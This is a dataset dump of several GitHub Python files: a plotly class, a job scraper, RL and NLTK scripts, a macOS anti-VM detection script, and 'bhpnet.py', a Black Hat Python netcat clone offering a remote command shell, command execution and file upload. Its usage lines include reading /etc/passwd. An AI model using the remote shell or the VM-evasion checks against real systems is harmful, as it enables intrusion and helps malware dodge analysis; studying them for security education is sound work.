blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
89a33a2d2fb2a28b98436986b935fd4cbc7f20a7
|
37fef592f365194c28579f95abd222cc4e1243ae
|
/streamlit/venv/venv/lib/python3.7/site-packages/plotly/graph_objs/splom/marker/colorbar/_tickformatstop.py
|
a3a8adde9676f505e52d3465cbd3ee72ce684873
|
[] |
no_license
|
edimaudo/Python-projects
|
be61e0d3fff63fb7bd00513dbf1401e2c1822cfb
|
85d54badf82a0b653587a02e99daf389df62e012
|
refs/heads/master
| 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null |
UTF-8
|
Python
| false | false | 9,564 |
py
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
    """Hierarchy node for ``splom.marker.colorbar.tickformatstop``.

    NOTE(review): this module is produced by plotly's code generator;
    changes belong in the generator templates, not in this file.
    """

    # class properties
    # --------------------
    _parent_path_str = "splom.marker.colorbar"
    _path_str = "splom.marker.colorbar.tickformatstop"
    # The only property names this node accepts.
    _valid_props = {"dtickrange", "enabled", "name", "templateitemname", "value"}

    # dtickrange
    # ----------
    @property
    def dtickrange(self):
        """
        range [*min*, *max*], where "min", "max" - dtick values which
        describe some zoom level, it is possible to omit "min" or "max"
        value by passing "null"

        The 'dtickrange' property is an info array that may be specified as:
        * a list or tuple of 2 elements where:
            (0) The 'dtickrange[0]' property accepts values of any type
            (1) The 'dtickrange[1]' property accepts values of any type

        Returns
        -------
        list
        """
        return self["dtickrange"]

    @dtickrange.setter
    def dtickrange(self, val):
        self["dtickrange"] = val

    # enabled
    # -------
    @property
    def enabled(self):
        """
        Determines whether or not this stop is used. If `false`, this
        stop is ignored even within its `dtickrange`.

        The 'enabled' property must be specified as a bool
        (either True, or False)

        Returns
        -------
        bool
        """
        return self["enabled"]

    @enabled.setter
    def enabled(self, val):
        self["enabled"] = val

    # name
    # ----
    @property
    def name(self):
        """
        When used in a template, named items are created in the output
        figure in addition to any items the figure already has in this
        array. You can modify these items in the output figure by
        making your own item with `templateitemname` matching this
        `name` alongside your modifications (including `visible: false`
        or `enabled: false` to hide it). Has no effect outside of a
        template.

        The 'name' property is a string and must be specified as:
          - A string
          - A number that will be converted to a string

        Returns
        -------
        str
        """
        return self["name"]

    @name.setter
    def name(self, val):
        self["name"] = val

    # templateitemname
    # ----------------
    @property
    def templateitemname(self):
        """
        Used to refer to a named item in this array in the template.
        Named items from the template will be created even without a
        matching item in the input figure, but you can modify one by
        making an item with `templateitemname` matching its `name`,
        alongside your modifications (including `visible: false` or
        `enabled: false` to hide it). If there is no template or no
        matching item, this item will be hidden unless you explicitly
        show it with `visible: true`.

        The 'templateitemname' property is a string and must be specified as:
          - A string
          - A number that will be converted to a string

        Returns
        -------
        str
        """
        return self["templateitemname"]

    @templateitemname.setter
    def templateitemname(self, val):
        self["templateitemname"] = val

    # value
    # -----
    @property
    def value(self):
        """
        string - dtickformat for described zoom level, the same as
        "tickformat"

        The 'value' property is a string and must be specified as:
          - A string
          - A number that will be converted to a string

        Returns
        -------
        str
        """
        return self["value"]

    @value.setter
    def value(self, val):
        self["value"] = val

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        dtickrange
            range [*min*, *max*], where "min", "max" - dtick values
            which describe some zoom level, it is possible to omit
            "min" or "max" value by passing "null"
        enabled
            Determines whether or not this stop is used. If
            `false`, this stop is ignored even within its
            `dtickrange`.
        name
            When used in a template, named items are created in the
            output figure in addition to any items the figure
            already has in this array. You can modify these items
            in the output figure by making your own item with
            `templateitemname` matching this `name` alongside your
            modifications (including `visible: false` or `enabled:
            false` to hide it). Has no effect outside of a
            template.
        templateitemname
            Used to refer to a named item in this array in the
            template. Named items from the template will be created
            even without a matching item in the input figure, but
            you can modify one by making an item with
            `templateitemname` matching its `name`, alongside your
            modifications (including `visible: false` or `enabled:
            false` to hide it). If there is no template or no
            matching item, this item will be hidden unless you
            explicitly show it with `visible: true`.
        value
            string - dtickformat for described zoom level, the same
            as "tickformat"
        """

    def __init__(
        self,
        arg=None,
        dtickrange=None,
        enabled=None,
        name=None,
        templateitemname=None,
        value=None,
        **kwargs,
    ):
        """
        Construct a new Tickformatstop object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of :class:`plotly.graph_objs.splom.marker.c
            olorbar.Tickformatstop`
        dtickrange
            range [*min*, *max*], where "min", "max" - dtick values
            which describe some zoom level, it is possible to omit
            "min" or "max" value by passing "null"
        enabled
            Determines whether or not this stop is used. If
            `false`, this stop is ignored even within its
            `dtickrange`.
        name
            When used in a template, named items are created in the
            output figure in addition to any items the figure
            already has in this array. You can modify these items
            in the output figure by making your own item with
            `templateitemname` matching this `name` alongside your
            modifications (including `visible: false` or `enabled:
            false` to hide it). Has no effect outside of a
            template.
        templateitemname
            Used to refer to a named item in this array in the
            template. Named items from the template will be created
            even without a matching item in the input figure, but
            you can modify one by making an item with
            `templateitemname` matching its `name`, alongside your
            modifications (including `visible: false` or `enabled:
            false` to hide it). If there is no template or no
            matching item, this item will be hidden unless you
            explicitly show it with `visible: true`.
        value
            string - dtickformat for described zoom level, the same
            as "tickformat"

        Returns
        -------
        Tickformatstop
        """
        super(Tickformatstop, self).__init__("tickformatstops")
        # Internal fast path used by the parent when re-wrapping children.
        if "_parent" in kwargs:
            self._parent = kwargs["_parent"]
            return

        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            # Shallow copy so popping keys below does not mutate the caller's dict.
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.splom.marker.colorbar.Tickformatstop
constructor must be a dict or
an instance of :class:`plotly.graph_objs.splom.marker.colorbar.Tickformatstop`"""
            )

        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        self._validate = kwargs.pop("_validate", True)

        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over values in `arg`.
        _v = arg.pop("dtickrange", None)
        _v = dtickrange if dtickrange is not None else _v
        if _v is not None:
            self["dtickrange"] = _v
        _v = arg.pop("enabled", None)
        _v = enabled if enabled is not None else _v
        if _v is not None:
            self["enabled"] = _v
        _v = arg.pop("name", None)
        _v = name if name is not None else _v
        if _v is not None:
            self["name"] = _v
        _v = arg.pop("templateitemname", None)
        _v = templateitemname if templateitemname is not None else _v
        if _v is not None:
            self["templateitemname"] = _v
        _v = arg.pop("value", None)
        _v = value if value is not None else _v
        if _v is not None:
            self["value"] = _v

        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
|
[
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2
|
ff21f04b692891b13fa2ed49293e5d99fea742db
|
/hunt/scripts/job_spider.py
|
41015307bdb3af0ba459f972c27a7bd7b13714fd
|
[] |
no_license
|
yangby-cryptape/job-hunter
|
3caf49c9290a077661c8e245565132e2a8671c05
|
1b58b2f23ac7d1aba08feaff29692adb8fe58161
|
refs/heads/master
| 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,263 |
py
|
#!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
    """Return a dict of browser-like HTTP request headers.

    When *gzip* is true, an Accept-Encoding header advertising
    gzip/deflate support is included as well.
    """
    base_headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-cn,zh;q=0.5",
        "Accept-Charset": "utf-8;q=0.7,*;q=0.7",
        "Keep-Alive": "115",
        "Connection": "keep-alive",
    }
    if gzip:
        base_headers["Accept-Encoding"] = "gzip,deflate"
    return base_headers
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
except Exception, e:
source = None
print e
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
    """Scrape one company's profile from its detail-page DOM.

    Returns an unsaved ``Company`` model instance built from the
    company-info table and the contact block of the page.
    (Docstring translated from Chinese.)
    """
    info_items = dom('.companyInfoItems')
    info_trs = info_items('.companyInfoTab tr')
    company_info = {}
    # Each table row is "<label>: <value>" - collect them into a dict.
    for tr in info_trs:
        tr = pq(tr)
        k = tr('td:eq(0)').text().split(u':')[0]
        v = tr('td:eq(1)').text()
        company_info[k] = v
    scale = company_info.get(u'公司规模')  # "company size", e.g. "100-499"
    if scale:
        sh = re.search(r'(\d+)-(\d+)', scale)
        scale = sh.groups() if sh else (None, None)
    else:
        scale = (None, None)
    ####
    # Contact block: more "<label>: <value>" pairs merged into the same dict.
    jcs = dom('.jobContact>div>div').find('div') # Job Contact
    for jc in jcs:
        jc = pq(jc)
        jctext = jc.text().split(u':')
        if len(jctext) == 2:
            k, v = jctext
            company_info[k] = v
    com = Company()
    com.name = info_items('.companyTitle').text()
    com.industry = company_info.get(u'公司行业')   # industry
    com.type = company_info.get(u'公司类型')       # company type
    com.address = company_info.get(u'公司地址')    # address
    com.website = company_info.get(u'公司主页')    # homepage
    com.scale_low, com.scale_high = scale
    com.email = None
    com.phone_num = None
    com.description = dom('.black12 tr:eq(2)').find('td').html()
    com.etag = ''
    return com
def getJobInfo(dom, company):
    """Scrape one job posting from its detail-page DOM.

    Returns an unsaved ``Job`` model instance.  *company* is accepted
    but not read here - presumably kept for interface symmetry; the
    caller assigns ``job.company`` itself (TODO confirm).
    (Docstring translated from Chinese.)
    """
    job_info = {}
    # First row holds the job category, e.g. "category: a/b" -> "a,b".
    type_tr = dom('.jobInfoItems tr:eq(0)')
    trtext = type_tr.text()
    trtext = trtext.split(u':') if trtext else []
    if len(trtext) == 2:
        k, v = trtext
        v = v.replace('/', ',')
        job_info[k] = v
    # Remaining rows are "<label>: <value>" cells.
    trs = dom('.jobInfoItems tr:gt(1)')
    for tr in trs:
        tr = pq(tr)
        tds = tr('td')
        for td in tds:
            td = pq(td)
            tdtext = td.text().split(u':')
            if len(tdtext) == 2:
                k, v = tdtext
                job_info[k] = v
    salary = job_info.get(u'职位月薪')  # "monthly salary", e.g. "4000-5999"
    if salary:
        sh = re.search(r'(\d+)-(\d+)', salary)
        salary = sh.groups() if sh else (None, None)
    else:
        salary = (None, None)
    quantity = job_info.get(u'招聘人数')  # "number of openings"
    if quantity:
        sh = re.search(r'(\d+)', quantity)
        quantity = sh.group(0) if sh else None
    job = Job()
    occ_type = job_info.get(u'职位类别')  # "occupation category"
    occ = Occupational.query.filter(Occupational.type==occ_type).first()
    if not occ:
        # First time this category appears: create a placeholder record.
        occ = Occupational()
        occ.name = 'FILL'
        occ.type = occ_type
        db.session.add(occ)
    job.occupational = occ
    job.type = job_info.get(u'工作性质')       # employment type
    job.exp = job_info.get(u'工作经验')        # work experience
    job.manage_exp = job_info.get(u'管理经验')  # management experience
    job.quantity = quantity
    job.degree = job_info.get(u'最低学历')     # minimum education
    job.salary_low, job.salary_high = salary
    job.description = dom('.jobDes').html()
    job.etag = ''
    return job
def getPage(page_num):
    """Crawl one zhaopin.com search-result page (*page_num* is a string).

    Every other row of the result table is a job listing; for each one
    the detail page is fetched, the company and job rows are stored and
    committed.  Returns ``(current_page, total_page)`` parsed from the
    pager text.  (Python 2 code: print statements.)
    """
    time.sleep(0.6)  # throttle requests to the listing server
    dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
    table = dom('#contentbox table:eq(1)')
    trs = table('tr:gt(0)')
    # Listing rows alternate with detail rows; process only the former.
    iseven = True
    for tr in trs:
        if iseven:
            tr = pq(tr)
            job_title = tr('#dvJobTit').text()
            job_url = tr('#dvJobTit a').attr('href')
            company_name = tr('#dvCompNM').text()
            company_url = tr('#dvCompNM a').attr('href')
            work_place = tr('td:eq(4)').text().split(' - ')
            work_city = work_place[0]
            work_area = work_place[1] if len(work_place) > 1 else None
            public_date = tr('td:eq(5)').text()
            time.sleep(0.6)  # throttle detail-page fetches too
            job_detail_dom = getDomFromUrl(job_url)
            company = getCompanyInfo(job_detail_dom)
            company.zhaopin_url = company_url
            db.session.add(company)
            job = getJobInfo(job_detail_dom, company)
            job.company = company
            job.title = job_title
            job.work_city = work_city
            job.work_area = work_area
            job.public_date = public_date
            job.zhaopin_url = job_url
            db.session.add(job)
            db.session.commit()
            print datetime.now()
            print 'This is Job %d' % job.id
        iseven = not iseven
    # Pager text looks like "<current>/<total>".
    total_page = dom('.pagehead .num:eq(1)').text()
    sh = re.search(r'(\d+)/(\d+)', total_page)
    current_page, total_page = sh.groups() if sh else (None, None)
    return int(current_page), int(total_page)
def doSpider():
    """Crawl every search-result page, starting from page 1.

    The first call also discovers the total page count; subsequent
    pages are fetched sequentially.  (Python 2 code: print statements.)
    """
    print datetime.now()
    print 'Start Get First page'
    current_page, total_page = getPage('1')
    print 'First page, Done!'
    print 'Total page: %d\n' % total_page
    for page_num in range(current_page+1, total_page+1):
        print datetime.now()
        print 'Start get page: [%d]' % page_num
        getPage(str(page_num))
        print 'page: [%d], Done!\n' % page_num
# Script entry point: run the full crawl (Python 2 syntax).
if __name__ == '__main__':
    print 'BEGIN TEST'
    doSpider()
    print 'TEST DONE'
|
[
"[email protected]"
] | |
ce6a731a6ac5188de720f8067367151a6da5e6f5
|
080f170a3ff105a15416a595787efabf0ccd1061
|
/tests/environment.py
|
0dde8bddf628c6e04e785eb4bf1ef57fd8c43795
|
[] |
no_license
|
JKCooper2/rlagents
|
16c3eaaf8bd06878e62e94e53338280398c15193
|
652bc4bcfb2426d7d3d437867f0e4ef33838a6c4
|
refs/heads/master
| 2020-04-11T01:28:44.833663 | 2016-09-07T09:02:11 | 2016-09-07T09:02:11 | 60,885,615 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,555 |
py
|
from rlagents.env_manager import EnvManager
from rlagents.agent_manager import AgentManager
from rlagents.agents import Agent
from rlagents.models import WeightedLinearModel, TabularModel
from rlagents.function_approximation import DefaultFA, DiscreteMaxFA, SingleTiling
from rlagents.memory import ListMemory, PandasMemory
from rlagents.exploration import DefaultExploration, EpsilonGreedy
from rlagents.optimisation import DefaultOptimiser, TemporalDifference, MonteCarlo
from rlagents.functions.decay import FixedDecay
def main():
    """Train a tabular Monte-Carlo agent on CartPole-v0 for 500 episodes."""
    # Assemble the agent from its parts; an alternative TD(0) configuration
    # existed here previously (see version history).
    model = TabularModel(mean=1, std=0.00)
    observation_fa = SingleTiling(num_tiles=8)
    memory = PandasMemory(size=1, columns=['observations', 'actions', 'rewards', 'done', 'new_obs'])
    exploration = EpsilonGreedy(FixedDecay(0.5, 0.99, 0.05))
    optimiser = MonteCarlo(learning_rate=FixedDecay(0.2, 1, 0.02))

    cartpole_agent = Agent(model=model,
                           action_fa=DiscreteMaxFA(),
                           observation_fa=observation_fa,
                           memory=memory,
                           exploration=exploration,
                           optimiser=optimiser)

    agent_manager = AgentManager(agent=cartpole_agent)
    env_manager = EnvManager('CartPole-v0', agent_manager)
    env_manager.run(n_episodes=500, video_callable=None)


if __name__ == "__main__":
    main()
|
[
"[email protected]"
] | |
52b6a665d04a47791c6b96f1ac90d1a98523b7ac
|
2bd3f4104ab1cbca1cf9a529df53c131f7f82c0f
|
/get_nltk_corpus.py
|
51af25f7682fee3329741ea066b1cc10658fca68
|
[] |
no_license
|
Wingtail/next_word_prediction
|
c01c007c056e696090c973af3b695ba3de891fa6
|
5362c3e1e864545b2651477d440b113f7e407bb1
|
refs/heads/main
| 2023-02-28T18:58:17.364457 | 2021-02-06T08:26:07 | 2021-02-06T08:26:07 | 334,380,067 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,314 |
py
|
from nltk.corpus import gutenberg, brown, nps_chat, webtext
import os
def get_gutenberg():
    """Dump every file of the NLTK Gutenberg corpus into ./text_data/.

    Fix: write with an explicit UTF-8 encoding — the original relied on
    the platform default encoding, which raises UnicodeEncodeError for
    corpus text on non-UTF-8 locales (e.g. Windows cp1252).
    """
    #Gutenberg corpus
    for fileid in gutenberg.fileids():
        print("Gutenberg fileid: ", fileid)
        with open("./text_data/" + fileid, "w", encoding="utf-8") as f:
            f.write(gutenberg.raw(fileid))
def get_brown():
    """Dump every file of the NLTK Brown corpus into ./text_data/.

    Words are space-joined into one raw string per file.  Fix: write
    with an explicit UTF-8 encoding instead of the platform default.
    """
    for fileid in brown.fileids():
        print("Brown fileid: ", fileid)
        raw_text = ' '.join(brown.words(fileid))
        with open("./text_data/" + fileid + ".txt", "w", encoding="utf-8") as f:
            f.write(raw_text)
def get_web_text():
    """Dump every file of the NLTK Webtext corpus into ./text_data/.

    Words are space-joined into one raw string per file.  Fix: write
    with an explicit UTF-8 encoding instead of the platform default.
    """
    for fileid in webtext.fileids():
        print("Webtext fileid: ", fileid)
        raw_text = ' '.join(webtext.words(fileid))
        with open("./text_data/" + fileid + ".txt", "w", encoding="utf-8") as f:
            f.write(raw_text)
def get_nps_chat():
    """Dump every file of the NLTK NPS Chat corpus into ./text_data/.

    Words are space-joined into one raw string per file.  Fix: write
    with an explicit UTF-8 encoding instead of the platform default.
    """
    for fileid in nps_chat.fileids():
        print("Npschat fileid: ", fileid)
        raw_text = ' '.join(nps_chat.words(fileid))
        with open("./text_data/" + fileid + ".txt", "w", encoding="utf-8") as f:
            f.write(raw_text)
def main():
    """Ensure the output directory exists, then download the corpora."""
    # makedirs(exist_ok=True) already tolerates an existing directory, so
    # the previous os.path.exists() pre-check was redundant (and racy).
    os.makedirs("./text_data/", exist_ok=True)
    # get_gutenberg()
    # get_brown()
    get_web_text()
    get_nps_chat()


if __name__ == "__main__":
    main()
|
[
"[email protected]"
] | |
87e4d72a1446c5d8ab1dc77fc9c1479275a6d6d8
|
580130b81a4e1815fb0fda9351d164cfdd279e44
|
/src/anti-vm/macOS/vm-check.py
|
6776c4fec84bb4c39fe5b10e5051031599075aa0
|
[
"MIT"
] |
permissive
|
Roblinks/malware-techniques
|
58b272a10369af587bd9808bf532ea84c743c444
|
2a74265bc74569a4e053d8406ade174e2cdc0a6c
|
refs/heads/master
| 2023-03-17T14:09:06.778972 | 2019-06-15T02:27:03 | 2019-06-15T02:27:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,613 |
py
|
# Different implementations of these mac virtualization detection techniques were used in OSX/MacRansom.
# Objective-See's analysis of this malware can be found here: https://objective-see.com/blog/blog_0x1E.html
# I found his work incredibly helpful as I was researching macOS malware.
import sys
sys.path.insert(0, "../..")
from utils.print import *
from utils.utils import run_cmd
def check_hardware_model():
    """
    On a real Mac, when the system is queried for the model, it will return
    something like this: "hw.model: MacBookPro14,2", but on a VM it will
    return something like 'VMware7,1'
    """
    print_blue("Hardware Model Test...")
    # "sysctl hw.model" prints "hw.model: <value>"; token [1] is the value.
    hardware_model = run_cmd("sysctl hw.model").stdout.decode()
    if "Mac" not in hardware_model.split()[1]:
        print_red("Running on a VM.")
    else:
        print_green("Running on a real Mac.")
def check_logical_physical_cpu_ratio():
    """
    A ratio of logical CPUs to physical CPUs that equals 1 may indicate
    a virtualized Mac environment.
    Real Mac:
        $ sysctl -n hw.logicalcpu
        4
        $ sysctl -n hw.physicalcpu
        2
    In VM:
        $ sysctl -n hw.logicalcpu
        2
        $ sysctl -n hw.physicalcpu
        2
    """
    print_blue("Physical vs. Logical CPU Count Test...")
    # "sysctl -n" prints the bare value, so int() parses it directly.
    logical_cpu_count = int(run_cmd("sysctl -n hw.logicalcpu").stdout.decode())
    physical_cpu_count = int(run_cmd("sysctl -n hw.physicalcpu").stdout.decode())
    # Equal counts mean no hyper-threading is visible - a VM heuristic,
    # not proof (some real Macs also lack hyper-threading).
    if logical_cpu_count == physical_cpu_count:
        print_red("Running on a VM.")
    else:
        print_green("Running on a real Mac.")
def ioreg_check():
    """
    Uses ioreg command to check for references to any virtualization software
    in the macOS I/O Kit registry.
    You can find a real world example of this in OSX.FairyTale, which can be
    downloaded from the Objective-See archives here: https://objective-see[.]com/downloads/malware/FairyTale.zip
    WARNING: THIS LINK DOWNLOADS LIVE MALWARE.
    """
    print_blue("ioreg Test...")
    # grep for the usual hypervisor vendor strings; empty output means
    # none were found in the I/O Kit registry.
    result = run_cmd("ioreg | grep -i -e \"vmware\" -e \"virtualbox\" -e \"parallels\" -e \"qemu\"").stdout.decode()
    if len(result) == 0:
        print_green("No virtualization software detected.")
    else:
        print_red("Virtualization software detected.")
def main():
    """Run each anti-VM detection check in turn."""
    checks = (check_hardware_model, check_logical_physical_cpu_ratio, ioreg_check)
    for check in checks:
        check()


if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
721d597cb8cb7b5d1b57d3e2e737f41435039559
|
0e2c0daf7d7cd3f5b90e41777d482f9d5bf07fab
|
/black_hat/bhpnet.py
|
a12954a7360212c207a0aa209bcf3aa0c36a9a99
|
[] |
no_license
|
jeffersonvivanco/Python_Notes
|
d7ec6202de50b99dfe0525e16758b5ac1e978d75
|
abc83311644c166484de48b130eae4971cf91733
|
refs/heads/master
| 2020-03-29T08:13:15.142037 | 2019-12-13T00:19:11 | 2019-12-13T00:19:11 | 94,665,904 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,360 |
py
|
import sys, socket, getopt, threading, subprocess
# Todo: Look up subprocess library
# define some global variables
listen = False
command = False
upload = False
execute = ''
target = ''
upload_destination = ''
port = 0
def usage():
    """Print command-line help for the tool, then exit with status 0."""
    help_lines = (
        'BHP Net Tool\n',
        'Usage: bhpnet.py -t target_host -p port',
        '-l --listen\t\t\t- listen on [host]:[port] for incoming connections',
        '-e --execute=file_to_run\t\t\t- execute the given file upon receiving a connection',
        '-c --command\t\t\t-initialize a command shell',
        '-u --upload=destination\t\t\t- upon receiving connection upload a file and write to [destination]\n\n',
        'Examples:',
        'bhpnet.py -t 192.168.0.1 -p 5555 -l -c',
        'bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe',
        'bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"',
        'echo "ABCDEFGHI" | ./bhpnet.py -t 192.168.0.1 -p 135',
    )
    for line in help_lines:
        print(line)
    sys.exit(0)
def client_sender(buffer):
    """Connect to the global target:port, send *buffer*, then act as a
    minimal interactive netcat client (print replies, forward stdin)."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect to our target host
        client.connect((target, port))
        print('[Debug] file: bhpnet.py; method: client_sender; buffer is ' + buffer)
        if len(buffer):
            print('[Debug] file: bhpnet.py; method: client_sender; buffer is ' + buffer)
            client.send(buffer.encode())
        while True:
            # now wait for data back
            recv_len = 1
            response = ''
            # accumulate until a short read signals the end of this reply
            while recv_len:
                data = client.recv(4096).decode()
                recv_len = len(data)
                response += data
                if recv_len < 4096:
                    break
            print(response)
            # wait for more input
            buffer = input('')
            buffer += '\n'
            # send it off
            client.send(buffer.encode())
    except:
        # NOTE(review): bare except hides the actual error (and catches
        # KeyboardInterrupt); consider logging the exception detail.
        print('[*] Exception exiting.')
        # tear down the connection
        client.close()
def server_loop():
    """Bind to the global target:port (all interfaces when no target is
    set) and hand each incoming connection to client_handler on its own
    thread.  Runs forever."""
    global target
    # if no target is defined, we listen on all interfaces
    if not len(target):
        target = '0.0.0.0'
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    while True:
        client_socket, addr = server.accept()
        # spin off a thread to handle our new client
        client_thread = threading.Thread(target=client_handler, args=(client_socket,))
        client_thread.start()
def run_command(command):
    """Execute *command* in a shell and return its output as bytes.

    Fix: always return bytes.  ``check_output`` yields bytes on success,
    but the original returned a str on failure, so callers could not
    treat the result uniformly.

    WARNING: shell=True executes the (untrusted) input string in a shell;
    that is this tool's purpose, but do not reuse this helper elsewhere.
    """
    # trim the newline
    command = command.rstrip()
    # run the command and get the output back
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except Exception:
        output = b'Failed to execute command.\r\n'
    # send output back to the client
    return output
# logic to do file uploads, command execution, and our shell
def client_handler(client_socket):
    """Serve one client connection: optional file upload, optional one-shot
    command execution, then an interactive shell if requested."""
    global upload
    global execute
    global command

    # check for upload
    # Responsible for determining whether our network tool is set to receive
    # a file when it receives a connection
    if len(upload_destination):
        # Fix: keep the buffer as bytes. The original decoded each chunk
        # and then crashed writing str to a file opened in 'wb' mode.
        file_buffer = b''
        # keep reading data until none is available
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            file_buffer += data
        # now we take these bytes and try to write them out
        try:
            # binary mode so uploaded executables are written verbatim
            with open(upload_destination, 'wb') as file_descriptor:
                file_descriptor.write(file_buffer)
            # acknowledge that we wrote the file out
            client_socket.send(('Successfully saved file to %s\r\n' % upload_destination).encode())
        except Exception:
            client_socket.send(('Failed to save file to %s\r\n' % upload_destination).encode())

    # check for command execution
    if len(execute):
        # run the command
        output = run_command(execute)
        # Fix: run_command returns bytes on success; calling .encode() on
        # bytes raised AttributeError. Encode only when it is a str.
        if isinstance(output, str):
            output = output.encode()
        client_socket.send(output)

    # now we go into another loop if a command shell was requested
    if command:
        while True:
            # show a simple prompt
            client_socket.send('<BHP:#> '.encode())
            # now we receive until we see a linefeed (enter key)
            cmd_buffer = ''
            while '\n' not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024).decode()
            # send back the command output
            response = run_command(cmd_buffer)
            if isinstance(response, str):
                response = response.encode()
            # Fix: socket.send requires bytes; the original sent a str here.
            client_socket.send(response)
def main():
    """Parse command-line options and dispatch to client or server mode."""
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    # read the commandline options
    try:
        # Fix: getopt long options that take a value need a trailing '=',
        # otherwise --execute/--target/--port/--upload silently take no
        # argument. Also the long form of -c is '--command'.
        opts, args = getopt.getopt(sys.argv[1:], 'hle:t:p:cu:',
                                   ['help', 'listen', 'execute=', 'target=', 'port=', 'command', 'upload='])
    except getopt.GetoptError as err:
        print(err)
        usage()
    for o, a in opts:
        if o in ('-h', '--help'):
            usage()
        elif o in ('-l', '--listen'):
            listen = True
        elif o in ('-e', '--execute'):
            execute = a
        elif o in ('-c', '--command'):
            # Fix: previously tested for '--commandshell', which getopt
            # never produces, so the long option was dead.
            command = True
        elif o in ('-u', '--upload'):
            upload_destination = a
        elif o in ('-t', '--target'):
            target = a
        elif o in ('-p', '--port'):
            port = int(a)
        else:
            assert False, 'Unhandled Option'

    # are we going to listen or just send data from stdin?
    if not listen and len(target) and port > 0:
        # read the buffer from the commandline
        # this will block, so send ctrl-d if not sending input to stdin
        buffer = sys.stdin.read()
        # send data off
        client_sender(buffer)

    # we are going to listen and potentially upload things, execute commands,
    # and drop a shell back depending on our command line options above
    if listen:
        server_loop()
# Fix: guard the entry point so importing this module does not start
# parsing argv / opening sockets as a side effect.
if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
8e2e47bdb27846e3b8e47cb2a5cef061a461040d
|
f75221bac60808f81fdee9962d2cdd72f99260f6
|
/src/renderer.py
|
4aadb0fb60907b4f676fc9672a5974975722cc9d
|
[
"MIT"
] |
permissive
|
pennomi/nihil-ace
|
8d6038f7bff63e62c0e7ff65cce1effa0d514216
|
cde9891e6b825089b466b4f10282036f52056a2a
|
refs/heads/master
| 2021-01-10T05:32:59.299479 | 2013-10-10T23:55:42 | 2013-10-10T23:55:42 | 8,436,087 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,526 |
py
|
from pymunk.vec2d import Vec2d
from pyglet import gl
from space import SPACE
SCREEN_WIDTH = 1000   # window width in pixels
SCREEN_HEIGHT = 700   # window height in pixels
SCREEN_CENTER = Vec2d(SCREEN_WIDTH/2, SCREEN_HEIGHT/2)  # camera anchor on screen
SCREEN_BUFFER = 16    # culling margin; multiplied by SPACE.scale in off_screen()
def off_screen(point):
    """Return True when *point* (world coordinates) projects outside the
    screen rectangle expanded by a scaled buffer margin."""
    screen_pt = adjust_for_cam(point)
    margin = SCREEN_BUFFER * SPACE.scale
